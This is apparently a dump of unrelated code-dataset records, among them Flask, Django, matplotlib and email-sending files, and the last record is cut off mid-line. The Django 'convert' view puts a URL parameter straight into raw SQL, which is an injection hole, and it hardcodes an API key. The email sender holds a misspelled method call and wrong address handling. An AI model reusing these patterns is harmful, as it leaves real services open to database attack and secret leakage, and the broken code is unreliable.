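F = 0.75        # new position; (1 + math.tanh(0.55)) / 2 comes out close to this
r = 0.02        # price change rate for this bin

# wealth_t = wealth_{t-1} * (1 + F_t * r_t) * (1 - fee * |F_t - F_{t-1}|)
wealth *= (1 + F * r) * (1 - fee * abs(F - F_prev))
print(round(wealth, 6))  # 1.014112 -> a 1.5% gross gain minus the turnover fee
```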
+{"seq_id":"507069013","text":"from utils.logger import TermLogger,AverageMeter\nfrom validation import val\nfrom train import train\nimport time\ndef main():\n    '''\n    TermLogger demo: a minimal training-loop framework\n    :return:\n    '''\n    epochs = 15\n    train_size = 10  # batches per training epoch\n    valid_size = 6\n\n    logger = TermLogger(n_epochs=epochs,\n                        train_size=train_size,\n                        valid_size=valid_size)\n    logger.reset_epoch_bar()\n\n\n    # optional validation pass before any training\n    first_val = True\n    val_names, val_losses = [], AverageMeter(precision=3)\n    if first_val:\n        val_names, val_losses = val(logger)\n\n    logger.reset_epoch_bar()\n    #logger.epoch_logger_update(epoch=0,display)\n\n    logger.epoch_bar.update(epoch=0)\n    logger.epoch_writer.write('---\\n---\\n---')\n    epoch_time = AverageMeter()\n\n\n\n    end = time.time()\n    for epoch in range(1,epochs):\n\n        train_names, train_losses = train(logger)\n\n        val_names, val_losses = val(logger)\n\n        epoch_time.update(time.time()-end)\n        end = time.time()\n\n\n        logger.reset_train_bar()\n        logger.reset_valid_bar()\n\n        #if log_terminal\n        logger.epoch_logger_update(epoch=epoch,time=epoch_time,names=val_names,values=val_losses)\n\n    logger.epoch_bar.finish()\n    print('over')\nif __name__ == '__main__':\n    main()\n","sub_path":"tutorials/train_val_framework/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"120555068","text":"'''\nCreated on 12 Feb, 2020\n\n@author: Tim Kreuzer\n'''\n\nimport subprocess\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask import current_app as app\n\nfrom app import utils_common, utils_file_loads, jlab_utils\nimport os\nfrom pathlib import Path\n\nclass JupyterLabHandler(Resource):\n def get(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n Containername: uuidcode_from_spawn \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Get JupyterLab Status\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n containername = request_headers.get(\"containername\")\n cmd1 = [\"docker\", \"ps\", \"-q\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n return \"False\", 200\n else:\n cmd2 = [\"docker\", \"ps\", \"-aq\", \"-f\", \"status=exited\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n # it's running\n return \"True\", 200\n else:\n # cleanup. Container status=exited\n cmd3 = [\"docker\", \"rm\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not cleanup non running container. Return False\".format(uuidcode))\n return \"False\", 200\n return \"False\", 200\n except:\n app.log.exception(\"JLab.get failed. 
Bugfix required\")\n return '', 500\n\n def post(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n accesstoken\n expire\n Body:\n email\n environments\n image\n port\n servername\n jupyterhub_api_url\n Config:\n basefolder # /etc/j4j/j4j_hdfcloud\n network\n cap-add\n memory\n memory-swap\n device\n storage-opt \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Start JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n app.log.trace(\"uuidcode={} - Json: {}\".format(uuidcode, request.json))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n request_json = {}\n for key, value in request.json.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_json[key.lower()] = value\n app.log.trace(\"uuidcode={} - New Headers: {}\".format(uuidcode, request_headers))\n app.log.trace(\"uuidcode={} - New Json: {}\".format(uuidcode, request_json))\n \n if \"SERVICELEVEL\" in request_json.get(\"environments\", {}).keys():\n config = utils_file_loads.get_servicelevel_config(request_json.get(\"environments\", {}).get(\"SERVICELEVEL\", \"default\"))\n else:\n config = utils_file_loads.get_general_config()\n basefolder = config.get('basefolder', '')\n userfolder = os.path.join(basefolder, request_json.get('email').replace(\"@\", \"_at_\"))\n serverfolder = Path(os.path.join(userfolder, '.{}'.format(uuidcode)))\n mounts = jlab_utils.get_mounts(app.log, uuidcode, serverfolder, userfolder)\n \n cmd = [\"timeout\", \"{}\".format(config.get('timeout', '30d')), \"docker\", \"run\"]\n cmd.append(\"--network\")\n cmd.append(config.get(\"network\"))\n cmd.append(\"--cap-add\")\n cmd.append(config.get(\"cap-add\"))\n cmd.append(\"--memory\")\n cmd.append(config.get(\"memory\"))\n cmd.append(\"--memory-swap\")\n cmd.append(config.get(\"memory-swap\"))\n cmd.append(\"--device\")\n cmd.append(config.get(\"device\"))\n cmd.append(\"--storage-opt\")\n cmd.append(config.get(\"storage-opt\"))\n cmd.append(\"--name\")\n cmd.append(uuidcode)\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"HPCACCOUNTS\", request_json.get(\"environments\",{}).get(\"HPCACCOUNTS\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_URL\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_CLIENT_ID\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_CLIENT_ID\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_TOKEN\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_TOKEN\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_USER\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_USER\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_SERVICE_PREFIX\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_SERVICE_PREFIX\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_BASE_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_BASE_URL\", \"\")))\n cmd.append(\"-e\")\n
cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKEN\", request.headers.get(\"accesstoken\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKENEXPIRATION\", request.headers.get(\"expire\", \"\")))\n cmd.extend(mounts)\n cmd.append(request_json.get(\"image\"))\n cmd.append(\"/home/jovyan/.start.sh\")\n cmd.append(str(request_json.get(\"port\")))\n cmd.append(request_json.get(\"servername\"))\n cmd.append(request_json.get(\"jupyterhub_api_url\"))\n #if request_json.get(\"service\", \"\").lower() == \"dashboard\":\n # cmd.append(request_json.get())\n cmd.append(\"&\")\n app.log.debug(\"uuidcode={} - Run Command: {}\".format(uuidcode, cmd))\n subprocess.Popen(cmd)\n except:\n app.log.exception(\"JLab.post failed. Bugfix required\")\n return \"\", 500\n return \"\", 202\n\n def delete(self):\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n containername: uuidcode from spawn\n \"\"\"\n try:\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Delete JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value \n containername = request_headers.get('containername')\n cmd1 = [\"docker\", \"container\", \"exec\", containername, \"/bin/umount\", \"/home/jovyan/B2DROP\"]\n cmd2 = [\"docker\", \"container\", \"exec\", containername, \"/bin/fusermount\", \"-u\", \"/home/jovyan/HPCMOUNT\"]\n cmd3 = [\"docker\", \"container\", \"rm\", \"--force\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount B2DROP\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount HPCMOUNT\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not stop container\".format(uuidcode))\n \n except:\n app.log.exception(\"JLabs.delete failed. Bugfix required\")\n return '', 500\n return '', 202\n","sub_path":"app/jlab.py","file_name":"jlab.py","file_ext":"py","file_size_in_byte":11688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"350185766","text":"import datetime\nfrom django.conf import settings\nfrom django.utils import timezone\nimport os\n\nfrom eulfedora.views import datastream_etag\nfrom eulfedora.server import Repository\nfrom eulfedora.util import RequestFailed\n\nfrom readux.annotations.models import Annotation\nfrom readux.books.models import Volume, VolumeV1_0, Page, PageV1_0\nfrom readux.utils import solr_interface, md5sum\n\n'''\nConditional methods for calculating last modified time and ETags\nfor view methods in :mod:`readux.books.views`.\n\n.. Note::\n\n In many cases, the Solr indexing timestamp is used rather than the object\n modification time, as this may account for changes to the site or indexing\n (including adding pages to a volume that is otherwise unchanged).\n'''\n\n\ndef volumes_modified(request, *args, **kwargs):\n 'last modification time for all volumes'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified\n\n # if user is logged in, changes in annotation totals result\n # in volume page display modifications\n latest_note = None\n if request.user.is_authenticated():\n latest_note = Annotation.objects.visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_modified(request, pid):\n 'last modification time for a single volume'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # if a user is logged in, page should show as modified\n # when annotation count changes\n latest_note = None\n if request.user.is_authenticated():\n # NOTE: shouldn't be very expensive to init volume here; not actually\n # making any api calls, just using volume to get volume\n # uri and associated annotations\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n # newest annotation creation for pages in this volume\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_pages_modified(request, pid):\n '''Last modification time for a single volume or its pages, or for\n any annotations of those pages.'''\n solr = solr_interface()\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n\n # NOTE: some overlap with Volume find_solr_pages method...\n results = solr.query((solr.Q(content_model=Volume.VOLUME_CMODEL_PATTERN) & solr.Q(pid=pid)) | \\\n (solr.Q(content_model=Page.PAGE_CMODEL_PATTERN) & solr.Q(isConstituentOf=vol.uri))) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # Page could also be modified based on annotations of the pages.\n # We only show total counts per page, so might not be 
modified if the\n # total number has not changed, but simplest just to get last modification\n # date in case of changes.\n # Note that this does NOT account for annotation deletions.\n\n # if a user is logged in, page should show as modified\n # based on annotations\n # Only displaying annotation *count* so creation time should\n # be sufficient. (Does not take into account deletions...)\n latest_note = None\n if request.user.is_authenticated():\n # get annotations for pages in this volume\n try:\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n except Annotation.DoesNotExist:\n # no notes for this volume\n pass\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef page_modified(request, vol_pid, pid):\n 'last modification time for a single page'\n solr = solr_interface()\n # TODO: use volume pid in query\n results = solr.query(content_model=PageV1_0.PAGE_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # if user is logged in, page should show as modified\n # when annotations have changed\n latest_note = None\n if request.user.is_authenticated():\n # last update for annotations on this volume, if any\n repo = Repository()\n page = repo.get_object(pid, type=Page)\n latest_note = page.annotations().visible_to(request.user) \\\n .last_updated_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef solrtimestamp_or_datetime(solrtime, othertime):\n # Compare and return the more recent of a solr timestamp or an\n # annotation datetime.\n\n # convert solr timestamp to timezone-aware for comparison;\n # return the most recent of the two\n # FIXME: assuming solr stores as UTC, confirm this\n if solrtime is not None and othertime is not None:\n solrtime = timezone.make_aware(solrtime, timezone.utc)\n return max(solrtime, othertime)\n\n # if both are not set, return solr time if present\n if solrtime is not None:\n return solrtime\n\n # if nothing has been returned, return other time (could be None)\n return othertime\n\n\nbooks_models_filename = os.path.join(settings.BASE_DIR, 'readux', 'books', 'models.py')\nbooks_models_modified = datetime.datetime.fromtimestamp(os.path.getmtime(books_models_filename))\nbooks_models_md5sum = md5sum(books_models_filename)\n\ndef unapi_modified(request):\n 'last-modification time for unapi; format list or metadata for a single item'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_modified\n\n # metadata for a specific record\n else:\n return volume_modified(request, item_id)\n\ndef unapi_etag(request):\n 'etag for unapi'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_md5sum\n\n # metadata for a specific record\n else:\n fmt = request.GET.get('format', None)\n if fmt == 'rdf_dc':\n return datastream_etag(request, item_id, Volume.dc.id, type=Volume)\n\n\ndef datastream_lastmodified(request, pid, dsid, type):\n repo = Repository()\n try:\n obj = repo.get_object(pid, type=type)\n ds = obj.getDatastreamObject(dsid)\n if ds and ds.exists:\n return ds.created\n except 
RequestFailed:\n pass\n\ndef pdf_etag(request, pid):\n 'etag for Volume PDF datastream'\n return datastream_etag(request, pid, Volume.pdf.id)\n\ndef pdf_lastmodified(request, pid):\n 'last modified for Volume PDF datastream'\n return datastream_lastmodified(request, pid, Volume.pdf.id, Volume)\n\ndef ocr_etag(request, pid):\n 'etag for Volume OCR datastream'\n return datastream_etag(request, pid, VolumeV1_0.ocr.id)\n\ndef ocr_lastmodified(request, pid):\n 'last modified for Volume OCR datastream'\n return datastream_lastmodified(request, pid, VolumeV1_0.ocr.id, Volume)\n\n# TODO: consider full text etag/lastmodified methods that would work\n# for both volume v1.0 and v1.1; if v1.0, simple returns ocr methods\n# above; otherwise, no etag is available but last-modified could be pulled\n# from most recent solr indexed page.\n# (If this requires additional fedora api calls to determine type,\n# may be too costly.)\n\ndef page_image_etag(request, pid, **kwargs):\n 'etag for Page image datastream'\n return datastream_etag(request, pid, Page.image.id, type=Page)\n\ndef page_image_lastmodified(request, pid, **kwargs):\n 'last modified for Page image datastream'\n return datastream_lastmodified(request, pid, Page.image.id, type=Page)\n\n","sub_path":"readux/books/view_helpers.py","file_name":"view_helpers.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
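# These helper pairs match the signature that Django's `condition` decorator
# expects, so the views in readux.books.views are presumably wired up roughly
# like this (a sketch; the view name and body are illustrative):
from django.views.decorators.http import condition

@condition(etag_func=pdf_etag, last_modified_func=pdf_lastmodified)
def pdf(request, pid):
    ...  # serve the Volume PDF datastream; 304 handling comes from the decorator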
+{"seq_id":"405750133","text":"##################################\r\n# Full Retirement Age Program\r\n# Cesar Carrillo\r\n##################################\r\n\r\n# Libraries\r\nimport math;\r\n\r\n# Global Variables\r\nRETIREMENT_AGES = [ (1937, (65, 0)),\r\n (1938, (65, 2)),\r\n (1939, (65, 4)),\r\n (1940, (65, 6)),\r\n (1941, (65, 8)),\r\n (1942, (65, 10)),\r\n (1943, (66, 0)),\r\n (1954, (66, 0)),\r\n (1955, (66, 2)),\r\n (1956, (66, 4)),\r\n (1957, (66, 6)),\r\n (1958, (66, 8)),\r\n (1959, (66, 10)),\r\n (1960, (67, 0)) ];\r\n\r\nMONTH_NAMES = [ \"January\",\r\n \"February\",\r\n \"March\",\r\n \"April\",\r\n \"May\",\r\n \"June\",\r\n \"July\",\r\n \"August\",\r\n \"September\",\r\n \"October\",\r\n \"November\",\r\n \"December\", ];\r\n\r\n# Input for integers only\r\ndef inputInt(prompt):\r\n integer = input(prompt);\r\n\r\n # Verify string\r\n if(integer.isnumeric()):\r\n return int(integer); # if int then return it\r\n else:\r\n print(\"\\nPlease enter an integer value\\n\");\r\n return inputInt(prompt); # if not call again\r\n\r\n# Returns the retirement age and month (YEAR, MONTH)\r\ndef findRetirementInfo(birthYear):\r\n # Go through the RETIREMENT_AGES list to\r\n # find and return the appropriate information\r\n for i in range(len(RETIREMENT_AGES)):\r\n year = RETIREMENT_AGES[i][0];\r\n age = RETIREMENT_AGES[i][1];\r\n\r\n if(birthYear == year):\r\n return age; # an exact match is found so return\r\n\r\n # because the list has a an ~11 year gap with no\r\n # months added this was the best way I thought to\r\n # check if the birthYear falls in that range\r\n # *for 1943 - 1954\r\n\r\n # make sure we are not at the end of the list\r\n # if so then return as there are no more years to check\r\n if(i >= len(RETIREMENT_AGES) - 1):\r\n return age;\r\n else:\r\n # check the current year (i) with the next year\r\n # if we are in between these years then we fall in\r\n # the range\r\n yearNext = RETIREMENT_AGES[i + 1][0];\r\n\r\n if(birthYear > year and birthYear < yearNext):\r\n return age;\r\n\r\n# Get the birth info from user\r\ndef requestBirthInfo():\r\n year = inputInt(\"Birth Year: \");\r\n month = inputInt(\"Birth Month: \");\r\n\r\n # the return order goes YEAR (0) then MONTH (1)\r\n return (year, month);\r\n\r\n# Calculate and return the retirementAge\r\ndef calculateRetirementDate(birthInfo, retirementInfo):\r\n # Calculate the retirement year and month by\r\n # adding the birthInfo and retirementInfo\r\n # in every function related to this program\r\n # the return order goes YEAR (0) then MONTH (1)\r\n retirementYear = retirementInfo[0] + birthInfo[0];\r\n retirementMonth = birthInfo[1] + retirementInfo[1];\r\n\r\n # If we are more than 12 months then adjust the year and months\r\n if(retirementMonth > 12):\r\n retirementYear += math.floor(retirementMonth / 12);\r\n retirementMonth -= 12;\r\n\r\n return (retirementYear, retirementMonth);\r\n\r\n# Returns month name using given month number\r\ndef getMonthName(month):\r\n return MONTH_NAMES[month - 1];\r\n\r\n# Prints the retirement information in a sentence\r\ndef printRetirementInfo(retirementInfo):\r\n retirementAge = retirementInfo[0];\r\n retirementMonth = retirementInfo[1];\r\n\r\n # Print Text\r\n retirementText = str(retirementAge);\r\n\r\n # Display months?\r\n if(retirementMonth > 0):\r\n retirementText += \" and \" + str(retirementMonth) + \" months\";\r\n\r\n print(\"Your full retirement age is\", retirementText);\r\n\r\n# Print the retirement date in a sentence\r\ndef printRetirementDate(retirementDate):\r\n 
print(\"this will be in\", getMonthName(retirementDate[1]), \"of\", retirementDate[0]);\r\n\r\n\r\n# Program Entry point\r\ndef main():\r\n\r\n running = True;\r\n\r\n print(\"Social Security Full Retirement Age Calculator\");\r\n\r\n while(running):\r\n print(\"-----------------------------------\");\r\n\r\n # Request info\r\n birthInfo = requestBirthInfo();\r\n\r\n # Calculate retirement age/month\r\n retirementInfo = findRetirementInfo(birthInfo[0]);\r\n\r\n # Print the info\r\n printRetirementInfo(retirementInfo);\r\n\r\n # Calculate the retirement date\r\n retirementDate = calculateRetirementDate(birthInfo, retirementInfo);\r\n\r\n # Print the retirement date\r\n printRetirementDate(retirementDate);\r\n\r\n # Ask if the program should keep running\r\n exitProgram = input(\"\\nExit program? (Y/N) \").lower();\r\n\r\n if(exitProgram == 'y' or exitProgram == 'yes'):\r\n running = False;\r\n\r\n\r\nmain(); # Run\r\n","sub_path":"retirementAge.py","file_name":"retirementAge.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"557012191","text":"from email.message import EmailMessage\nfrom smtplib import SMTP\nfrom abc import ABCMeta, abstractmethod\nimport os\n\nclass EmailSender(metaclass=ABCMeta):\n @abstractmethod\n def send(self,msg: EmailMessage):\n pass\n\nclass SimpleEmailSender(EmailSender):\n\n SMTP_SERVER_PORT:str=\"SMTP_SERVER_PORT\"\n\n @classmethod\n def send(cls,msg: EmailMessage):\n server_port = os.environ[cls.SMTP_SERVER_PORT]\n servers = server_port.split(':')\n with SMTP(servers[0],int(servers[1])) as s:\n s.send_messagatsuogae(msg)\n\nclass EmailBuilder:\n\n _registered_email_sender: EmailSender = None\n\n @classmethod\n def send_html_message(cls, from_address: str,subject: str, to_address: list[str]=None, cc_address: list[str]=None,\n body: str=None, attachment_files: list[str] = None) -> EmailMessage:\n email = EmailMessage()\n email['Subject'] = subject\n email['From'] = from_address\n if to_address is not None and len(to_address) > 0 :\n email['To'] = '.'.join(to_address)\n if cc_address is not None and len(cc_address) > 0:\n email['Cc'] = '.'.join(to_address)\n\n if body is not None:\n email.set_content(body, subtype='html')\n\n if attachment_files is not None and len(attachment_files)>1 :\n for filepath in attachment_files:\n mime_type= cls.__get_mime_type(filepath)\n with open(filepath, 'rb') as content_file:\n content = content_file.read()\n email.add_attachment(content,\n maintype=mime_type['maintype'], subtype=mime_type['subtype'],\n filename=filepath)\n\n if cls._registered_email_sender is None:\n SimpleEmailSender().send(email)\n else:\n cls._registered_email_sender.send(email)\n\n return email\n\n @classmethod\n def register_mail_sender(cls, custom_mail_sender: EmailSender):\n cls._registered_email_sender=custom_mail_sender\n\n @classmethod\n def __get_mime_type(cls, path: str) -> dict:\n if path == '':\n return None\n parts = path.split('.')\n if len(parts)<2:\n return None\n\n extension = parts[len(parts)-1]\n\n applications = ['zip','pdf']\n texts=['txt']\n images=['png','jpeg','gif']\n\n if extension in applications:\n return dict(maintype='application',subtype=extension)\n elif extension in images:\n return dict(maintype='image',subtype=extension)\n elif extension=='jpg':\n return dict(maintype='image', subtype='jpeg')\n elif extension=='html':\n return dict(maintype='text',subtype='html')\n elif extension in texts:\n return dict(maintype='text',subtype='plain')\n else:\n return dict(maintype='application',subtype='octet-stream')","sub_path":"tests/resources/source/folder1/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"155023588","text":"# coding:iso-8859-9 Türkçe\r\n# p_31508.py: Izgaralar ile çoklu fonksiyonları çizme örneği.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as mp\r\nimport matplotlib.gridspec as mg\r\nfrom p_315 import Renk\r\n\r\nmp.style.use (\"dark_background\")\r\nmp.figure (figsize=(7, 4))\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = mp.subplot (ızgara [0, :])\r\naltşekil1.plot (X, F1, 'r-', X, F2)\r\n\r\naltşekil2 = mp.subplot (ızgara [1, :-1])\r\naltşekil2.plot (X, F3)\r\n\r\naltşekil3 = mp.subplot (ızgara [1:, -1])\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = mp.subplot (ızgara [-1, 0])\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = mp.subplot (ızgara [-1, -2])\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0])\r\n\r\nmp.tight_layout()\r\nmp.show()\r\n#-------------------------------------------------------------------------------------------------\r\n\r\n\r\nşekil = mp.figure (figsize=(7, 4))\r\nşekil.set_facecolor (Renk.renk())\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = şekil.add_subplot (ızgara [0, 0:3])\r\naltşekil1.set_facecolor (Renk.renk())\r\naltşekil1.plot (X, F1, 'r-', X, F2, \"y-\")\r\n\r\naltşekil2 = şekil.add_subplot (ızgara [1, 0:2])\r\naltşekil2.set_facecolor (Renk.renk())\r\naltşekil2.plot (X, F3, \"g\")\r\n\r\naltşekil3 = şekil.add_subplot (ızgara [1:3, 2])\r\naltşekil3.set_facecolor (Renk.renk())\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = şekil.add_subplot (ızgara [2, 0])\r\naltşekil4.set_facecolor (Renk.renk())\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = şekil.add_subplot (ızgara [2, 1])\r\naltşekil5.set_facecolor (Renk.renk())\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0], \"m\")\r\n\r\nşekil.tight_layout()\r\nmp.show()\r\n","sub_path":"Bernd Klein (520) ile Python/p_31508.py","file_name":"p_31508.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"448488727","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef index(req):\n return render(req, 'sinabro/index.html', {'title': 'Sinabro'})\n\ndef convert(req, target, word):\n import json\n from .models import Word\n\n if target in ['south', 'north']:\n query = \"\"\"\n SELECT\n *\n FROM\n sinabro_word\n WHERE\n REPLACE(%s, ' ', '')='%s'\n \"\"\" % ('south' if target == 'north' else 'north', word.replace(' ', ''))\n\n query_result = Word.objects.raw(query)\n matched_words = []\n for q in query_result:\n matched_words.append({\n 'word': q.south if target == \"south\" else q.north,\n 'description': {'word': q.south, 'mean': q.description} if q.description is not None and len(q.description) else dictionary(q.south)\n })\n\n if len(matched_words):\n result = {\n 'code': 200,\n 'target': target,\n 'original_word': word,\n 'converted_word': matched_words\n }\n else:\n result = {\n 'code': 404,\n 'err_message': 'Word not found'\n }\n else:\n result = {\n 'code': 400,\n 'err_message': 'Invalid parameters'\n }\n\n return HttpResponse(json.dumps(result))\n\ndef dictionary(word):\n from urllib.request import urlopen\n from urllib.parse import quote\n import xml.etree.ElementTree as ET\n from .models import Word\n\n key = \"F617DC1EF4D10410220D828231595C24\"\n quoted = quote(word)\n url = \"http://opendict.korean.go.kr/api/search\"\n params = {'key': key, 'q': quoted}\n\n first = True\n for k, v in params.items():\n if first:\n url += '?'\n first = False\n else:\n url += '&'\n url += k + '=' + v\n\n response = urlopen(url).read().decode('utf-8')\n parsed = 